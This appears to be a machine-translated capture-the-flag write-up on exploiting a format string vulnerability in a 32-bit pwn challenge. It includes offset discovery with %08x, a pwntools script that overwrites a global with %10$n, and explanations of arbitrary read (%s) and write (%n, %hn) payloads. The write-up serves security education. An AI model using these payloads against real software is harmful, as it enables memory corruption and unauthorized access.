Format string vulnerability ？

Existing scenario ： There are formatted output functions

If you enter normal characters , There will be no problem with the program .

The condition of format string vulnerability is that the parameters required by the format string do not match the parameters actually provided .

Why can I compile ？
because printf() The parameters of the function are defined as variable .
In order to find mismatches , The compiler needs to understand printf() How it works and what the format string is . However , The compiler doesn't know this .
Sometimes the format string is not fixed , It may be dynamically generated during program execution .

printf() Can the function find the mismatch by itself ？
printf() Take parameters from the stack , If it needs 3 individual , Then take it out 3 individual . Unless the boundary of the stack is marked , otherwise printf() You won't know that it takes more parameters than it provides . However, there is no such mark .

One 、 View file information

First file ./pwn Check the file type and then checksec --file=pwn Check the file protection .

We found that ：32 Bit program , Set up canary, Cannot stack overflow .

Two 、IDA Decompile

Here we use ida 32 Bit open file .
We see the mian function , Found several suspicious places ：

The main idea of the source program is to put random numbers into 0x804c044 It's about , The user enters the user name and password , If the password is equal to the random number , Get permission .

I saw it printf, Plus canary jurisdiction , You can think of examining the format string vulnerability .

First, let's make use of AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x To calculate the offset ：

because A Of Ascll Code is 41, four A Namely 41414141, We can see in the picture that the tenth output is 41414141 So the offset is 10.

After that, just modify dword_804c044 Value , Let input and dword_804c044 The same value of .

And this function ：

Represents writing four bytes to this address .
for instance ：
When payload by aaaa%7$n when , The number of characters output is 4, The program will 4 write in 0x61616161 Point to memory .
So we're going to use % 10 $ n To modify it , What we write is also 4, because read(fd, &dword_804C044, 4u); Read in is 4 Bytes .

So our code is ：

from pwn import *
## remote() Establish a remote connection , To specify ip and port
io = remote('node4.buuoj.cn', 26427)
leak_addr = 0x804C044
io.recvuntil('your name:')
payload1 = p32(leak_addr) + b'%10$n'
io.sendline(payload1)# send data 
io.recvuntil('your passwd:') # And shell Interact 
io.sendline(b'4')
io.interactive()

Because the password should be the same as the value stored in the address , So we changed the password to b’4’.

summary

Some knowledge used here ：
1. Read from any address ：

according to 0x01 Knowledge in , We just need to put the last one %08x Switch to %s You can read 0x61616161 Address data , Pay attention to this 0x61616161 It's something we can control , It is the first four bytes we input and these four bytes are the read address . therefore , You can replace this payload The first four bytes of complete arbitrary address reading .

This payload It can also be reduced to aaaa%7$s,\; there7$ It means to take printf The seventh parameter of (0x61616161), If you want to use constant width output here payload It's like this aaaa%7$08x, The result will be output aaaa61616161.

2. Write at any address ：

Let's get to know %n The role of .%n Is to write the number of output characters into memory .

According to the above knowledge , When payload by aaaa%7$n when , The number of characters output is 4, The program will 4 write in 0x61616161 Point to memory . If we need to write a larger number, we have to use equal width output . hypothesis , We need to 0x61616161 write in 100, be payload It becomes aaaa%7$0100n.

Another problem with arbitrary address writing is , If we want to write a large number , For example, we need to 0x8048320 write in 0x61616161, This 16 The decimal number corresponding to base is 134513440, That is to say, it needs to be output 134513440 Characters . Don't think too much. , The program is bound to crash .

What if you encounter this situation ？ We can go through %hn Write two bytes two bytes . In the example above , We will 0x8048320 Split into two bytes high 0x804 And two bytes lower 0x8320, take 0x804 It's the decimal system 2052 write in 0x61616161 – 0x61616162; take 0x8320 It's the decimal system 33568 write in 0x61616163 – 0x61616164. Write in two times to complete a large number of writes .

Reference link

I met this problem for the first time , I've read a lot of big guys' commentaries , There are even many ways , I only use the method of modifying the value here . No way! , Vegetable dogs have to do more , I'm sorry I didn't make it clear , So please attach my reference link ：

1. Knowledge explanation
2.pwn Conclusion of the examination
3. Format string vulnerability
4. The explanation of the title
5. many-ways